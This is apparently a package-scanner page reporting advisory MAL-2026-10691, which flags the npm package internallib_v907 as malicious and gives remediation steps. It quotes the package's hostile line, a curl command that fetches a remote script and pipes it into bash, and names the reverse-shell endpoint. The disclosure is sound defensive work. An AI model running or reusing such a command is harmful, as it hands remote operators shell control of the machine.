OSV Malicious Advisory
scanned 14h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10691 confirms this npm version as malicious. index.js line 5 invokes exec('/bin/bash -c "curl https://reverse-shell.sh/... | sh"'), piping a remote script directly into a shell. The fetched payload establishes a reverse shell to the hardcoded endpoint 10.0.67.6:4444, giving a remote operator interactive shell access on the host running the package...
Advisory
MAL-2026-10691
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in internallib_v907 (npm)
Details
index.js line 5 invokes exec('/bin/bash -c "curl https://reverse-shell.sh/... | sh"'), piping a remote script directly into a shell. The fetched payload establishes a reverse shell to the hardcoded endpoint 10.0.67.6:4444, giving a remote operator interactive shell access on the host running the package. The destination is not caller-configurable, no integrity check is performed on the fetched script, and the package name (internallib_v907) does not correspond to any documented functionality that would justify remote shell execution.
## Source: ghsa-malware (3c850b86a20a3638c4500c1d45e839bcce3b889e2ee9e752c6af86eb7e95a750) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
OpenSSF Malicious Packages via OSV confirms internallib_v907@1.0.3 as malicious (MAL-2026-10691): Malicious code in internallib_v907 (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory